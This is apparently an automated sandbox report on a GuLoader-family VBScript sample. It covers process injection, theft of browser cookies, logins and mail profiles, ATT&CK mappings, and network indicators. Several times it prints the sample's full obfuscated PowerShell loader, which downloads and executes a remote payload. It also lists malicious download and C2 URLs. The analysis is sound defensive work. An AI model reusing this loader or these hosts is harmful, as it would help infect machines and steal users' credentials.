          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeSection loaded: NULL target: C:\Windows\SysWOW64\msinfo32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeThread register set: target process: 6892Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 2C80000Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677eJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. 
StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadiJump to behavior
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677e
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe | Process created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"
          Source: C:\Windows\SysWOW64\msinfo32.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#lediggang graadighedens disciplineringer bagermestrene teutonisk uptilt #>;$spegeplserne='nymaledes';<#messiness compromising anaphalis gennemarbejdelsen fodervikkerne #>;$laparotomize140=$host.'privatedata';if ($laparotomize140) {$trikotagefabrikker++;}function spdbarnsplejerens($ledningernes){$annelism=$totlafholdenhed61+$ledningernes.length-$trikotagefabrikker; for( $omgik=7;$omgik -lt $annelism;$omgik+=8){$methodisers='exuscitate';$protaspis+=$ledningernes[$omgik];$newsroom204='dkfjers';}$protaspis;}function optllingslister($baulky){ & ($unark) ($baulky);}$steamboating=spdbarnsplejerens 'mouthfumdecollaouarb,jdzraabaaniudf ldelundertilantipreanebra.k/averrab5stedbrd.faglrer0 ful,vr blottel(porch dwb taliniafgangsnrati,nedpopuliso ove clwallokatsbegnawn hjertebn kal etttempl r materia1haunche0waylanr. instit0gri tmi;departe c araciw,uccubei.aftkjonandest 6eardro 4 increa; delege finansrx uterom6 mysti 4fgtmedd;a,reste barramurmacroptvkonvolu:re ligh1 graph 2argenti1delubru.apace a0bebutto)lystbaa unquietg spelmae twelfhcattak ekskamrdmoquantis/persona2hemidom0noggkas1 nonchr0,anebry0jaszmal1futu is0ud lugt1 arquat bararmflikenesiquizzysrichthyoeluncherfozoniz.oraastofx.hefmgl/gra,bea1aym sar2 fje,ne1.ongrat.andelss0no merc ';$railcard=spdbarnsplejerens 'syltdepusoapfissdkningsesvartidrridning- er,rina painkigoverophe gustinn negatitforkerk ';$ekspatrieret=spdbarnsplejerens 'bille thg,ilingtthrenodtbibliotpnonevilsskydere:evangel/ mpetu/ fili,tp datostuspecialb blomme-tremour2pladshof achi l7nipsetsd quater0 upersu7gagered1vgtford5 repr.f3,nakepregreenerahousefl1ev kost4 b.odsp0moduler3ansamle1jengene8sockhea4 leopardstengun6bioscie2tonikum2u,ifiab6skammel6litigatd ind kr9unperv.cafisnin2regiona8theodraeangolan4s hoolb1 thelyt. 
stavnsrteleotr2t pefli.drmmebid conspiemicrotovtopchef/udlistnntaagetmepennyspddr gbolkriddersotrvlerng krgenderecan.e. betacim kruspes deadmeohusass ';$overrigidness=spdbarnsplejerens 'soapyre>indsnus ';$unark=spdbarnsplejerens 'terningi,vergeneslank ixkaosets ';$metaprescutum='caddises';$arkivskab='\nationalsocialisternes.ska';optllingslister (spdbarnsplejerens 'uhjlpso$bepaidlgbetali lrea izaodisser,bespartoatyr fgtlklderen:cebid nm ogejome s pprekpapembaa oblig.nkliniklibankemashaplontmo dsgniefinlandrhenns.n= n.trog$ ego,seeplasmasn.ultidevillegit:bu.kladapel,rgoprakitispquincyud guideba antasitthomisiaunhands+wasabis$racial,an nsurgrunmercekforsortidolomitvamn,mons et,opikbulwarkapungpebbbowkerb ');optllingslister (spdbarnsplejerens 'excla,m$kronprigopvaskelstumbleo otulisb forma,asulfosrldiscolo: nightiitendo.onunwiseqd libra i besselspakhusetwindburi pneumone,rthwacadaptivtagranulnflambeeeslingresannot tsudv elg= orchit$uncapitelinj,skkreflektsbleeralpenta glakannikktbedstevriagttagisnotdumenabofamrnostalgepara.phtacrolog.reak orsb listip pologelrhipidoi esidentdonnere(hematoz$zenithworadi
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#lediggang graadighedens disciplineringer bagermestrene teutonisk uptilt #>;$spegeplserne='nymaledes';<#messiness compromising anaphalis gennemarbejdelsen fodervikkerne #>;$laparotomize140=$host.'privatedata';if ($laparotomize140) {$trikotagefabrikker++;}function spdbarnsplejerens($ledningernes){$annelism=$totlafholdenhed61+$ledningernes.length-$trikotagefabrikker; for( $omgik=7;$omgik -lt $annelism;$omgik+=8){$methodisers='exuscitate';$protaspis+=$ledningernes[$omgik];$newsroom204='dkfjers';}$protaspis;}function optllingslister($baulky){ & ($unark) ($baulky);}$steamboating=spdbarnsplejerens 'mouthfumdecollaouarb,jdzraabaaniudf ldelundertilantipreanebra.k/averrab5stedbrd.faglrer0 ful,vr blottel(porch dwb taliniafgangsnrati,nedpopuliso ove clwallokatsbegnawn hjertebn kal etttempl r materia1haunche0waylanr. instit0gri tmi;departe c araciw,uccubei.aftkjonandest 6eardro 4 increa; delege finansrx uterom6 mysti 4fgtmedd;a,reste barramurmacroptvkonvolu:re ligh1 graph 2argenti1delubru.apace a0bebutto)lystbaa unquietg spelmae twelfhcattak ekskamrdmoquantis/persona2hemidom0noggkas1 nonchr0,anebry0jaszmal1futu is0ud lugt1 arquat bararmflikenesiquizzysrichthyoeluncherfozoniz.oraastofx.hefmgl/gra,bea1aym sar2 fje,ne1.ongrat.andelss0no merc ';$railcard=spdbarnsplejerens 'syltdepusoapfissdkningsesvartidrridning- er,rina painkigoverophe gustinn negatitforkerk ';$ekspatrieret=spdbarnsplejerens 'bille thg,ilingtthrenodtbibliotpnonevilsskydere:evangel/ mpetu/ fili,tp datostuspecialb blomme-tremour2pladshof achi l7nipsetsd quater0 upersu7gagered1vgtford5 repr.f3,nakepregreenerahousefl1ev kost4 b.odsp0moduler3ansamle1jengene8sockhea4 leopardstengun6bioscie2tonikum2u,ifiab6skammel6litigatd ind kr9unperv.cafisnin2regiona8theodraeangolan4s hoolb1 thelyt. 
stavnsrteleotr2t pefli.drmmebid conspiemicrotovtopchef/udlistnntaagetmepennyspddr gbolkriddersotrvlerng krgenderecan.e. betacim kruspes deadmeohusass ';$overrigidness=spdbarnsplejerens 'soapyre>indsnus ';$unark=spdbarnsplejerens 'terningi,vergeneslank ixkaosets ';$metaprescutum='caddises';$arkivskab='\nationalsocialisternes.ska';optllingslister (spdbarnsplejerens 'uhjlpso$bepaidlgbetali lrea izaodisser,bespartoatyr fgtlklderen:cebid nm ogejome s pprekpapembaa oblig.nkliniklibankemashaplontmo dsgniefinlandrhenns.n= n.trog$ ego,seeplasmasn.ultidevillegit:bu.kladapel,rgoprakitispquincyud guideba antasitthomisiaunhands+wasabis$racial,an nsurgrunmercekforsortidolomitvamn,mons et,opikbulwarkapungpebbbowkerb ');optllingslister (spdbarnsplejerens 'excla,m$kronprigopvaskelstumbleo otulisb forma,asulfosrldiscolo: nightiitendo.onunwiseqd libra i besselspakhusetwindburi pneumone,rthwacadaptivtagranulnflambeeeslingresannot tsudv elg= orchit$uncapitelinj,skkreflektsbleeralpenta glakannikktbedstevriagttagisnotdumenabofamrnostalgepara.phtacrolog.reak orsb listip pologelrhipidoi esidentdonnere(hematoz$zenithworadi
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match | File source: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000002.2955140831.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.2543568933.0000000024700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.2955372386.0000000002BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.2955148766.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000002.2955249123.0000000004C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.2544153499.0000000024B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\msinfo32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\msinfo32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\msinfo32.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\msinfo32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\msinfo32.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\msinfo32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\msinfo32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\msinfo32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\msinfo32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

          Remote Access Functionality

          Source: Yara match | File source: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000002.2955140831.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.2543568933.0000000024700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.2955372386.0000000002BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.2955148766.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000002.2955249123.0000000004C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.2544153499.0000000024B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          ATT&CK matrix (one line per tactic; a number before a technique name is the count badge the report shows for that technique)

          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
          Resource Development: 11 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
          Execution: 1 Windows Management Instrumentation; 1 Exploitation for Client Execution; 2 Command and Scripting Interpreter; 2 PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
          Persistence: 11 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
          Privilege Escalation: 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 511 Process Injection; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
          Defense Evasion: 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 31 Virtualization/Sandbox Evasion; 511 Process Injection
          Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
          Discovery: 2 File and Directory Discovery; 114 System Information Discovery; 121 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
          Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
          Command and Control: 3 Ingress Tool Transfer; 11 Encrypted Channel; 4 Non-Application Layer Protocol; 5 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
          Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
          Behavior Graph ID: 1526385 | Sample: Narudzba ACH0036173.vbe | Startdate: 05/10/2024 | Architecture: WINDOWS | Score: 100
          Graph content recoverable from the figure:
          Network nodes: www.casesrep.site; casesrep.site; 3 other IPs or domains; pub-2f7d07153ea1403184d62266d9c28e41.r2.dev (162.159.140.237, 443, 49730, 49737, CLOUDFLARENETUS, United States); casesrep.site (84.32.84.32, 49946, 50005, 50006, NTT-LT-ASLT, Lithuania); www.kuaimaolife.shop (38.55.251.233, 50009, 50010, 80, COGENT-174US, United States)
          Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 6 other signatures
          Process chain: the sample starts powershell.exe (18) and wscript.exe (1). powershell.exe: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Queues an APC in another process (thread injection); starts msiexec.exe (6) and conhost.exe. wscript.exe: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found; starts powershell.exe (14, 18) and cmd.exe (1). msiexec.exe: Maps a DLL or memory area into another process; HTiDHBMqChwMbO.exe injected. The second powershell.exe contacts pub-2f7d07153ea1403184d62266d9c28e41.r2.dev: Found suspicious powershell code related to unpacking or dynamic code loading; starts conhost.exe. cmd.exe: Uses ping.exe to check the status of other devices and networks; starts conhost.exe and PING.EXE (1). Injected HTiDHBMqChwMbO.exe: Maps a DLL or memory area into another process; Found direct / indirect Syscall (likely to bypass EDR); starts msinfo32.exe (13). msinfo32.exe: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures; HTiDHBMqChwMbO.exe injected; starts firefox.exe. The second injected HTiDHBMqChwMbO.exe contacts casesrep.site and www.kuaimaolife.shop: Found direct / indirect Syscall (likely to bypass EDR).
Source | Detection | Scanner | Label
Narudzba ACH0036173.vbe | 26% | ReversingLabs | Script-WScript.Trojan.GuLoader
Narudzba ACH0036173.vbe | 11% | Virustotal |
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label
pub-2f7d07153ea1403184d62266d9c28e41.r2.dev | 0% | Virustotal |
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore6lB | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal |
http://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev | 0% | Virustotal |
https://github.com/Pester/Pester | 1% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
pub-2f7d07153ea1403184d62266d9c28e41.r2.dev | 162.159.140.237 | true | false | | unknown
casesrep.site | 84.32.84.32 | true | true | | unknown
www.kuaimaolife.shop | 38.55.251.233 | true | false | | unknown
www.casesrep.site | unknown | unknown | true | | unknown
6777.6777.6777.677e | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/nedkoge.mso | false | | unknown
https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/BEkfITzYaj231.bin | false | | unknown
http://www.casesrep.site/7z6q/ | true | | unknown
http://www.kuaimaolife.shop/80e1/ | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/nedkoge.msoP | powershell.exe, 00000004.00000002.1839361378.0000020AE34AB000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.1862118797.0000020AF32F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2043963608.0000000005918000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.2017385313.0000000004A0B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.2017385313.0000000004A0B000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://go.micro | powershell.exe, 00000004.00000002.1839361378.0000020AE3E41000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/BEkfITzYaj231.bin$Y | msiexec.exe, 0000000B.00000003.2400330644.0000000008CD0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://contoso.com/License | powershell.exe, 00000006.00000002.2043963608.0000000005918000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000006.00000002.2043963608.0000000005918000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev | powershell.exe, 00000004.00000002.1839361378.0000020AE5009000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/ | msiexec.exe, 0000000B.00000003.2400330644.0000000008CD0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/BEkfITzYaj231.bing | msiexec.exe, 0000000B.00000002.2530755175.0000000008CA8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.2017385313.0000000004A0B000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/M | msiexec.exe, 0000000B.00000003.2400330644.0000000008CD0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000006.00000002.2017385313.00000000048B1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev | powershell.exe, 00000004.00000002.1839361378.0000020AE4CB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1839361378.0000020AE34AB000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://contoso.com/ | powershell.exe, 00000006.00000002.2043963608.0000000005918000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.1862118797.0000020AF32F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2043963608.0000000005918000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.1839361378.0000020AE3281000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.1839361378.0000020AE3281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2017385313.00000000048B1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/BEkfITzYaj231.binE | msiexec.exe, 0000000B.00000002.2530755175.0000000008CA8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/nedkoge.msoXR | powershell.exe, 00000006.00000002.2017385313.0000000004A0B000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
162.159.140.237 | pub-2f7d07153ea1403184d62266d9c28e41.r2.dev | United States | 13335 | CLOUDFLARENETUS | false
84.32.84.32 | casesrep.site | Lithuania | 33922 | NTT-LT-ASLT | true
38.55.251.233 | www.kuaimaolife.shop | United States | 174 | COGENT-174US | false
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1526385
                                          Start date and time:2024-10-05 14:48:46 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 9m 35s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
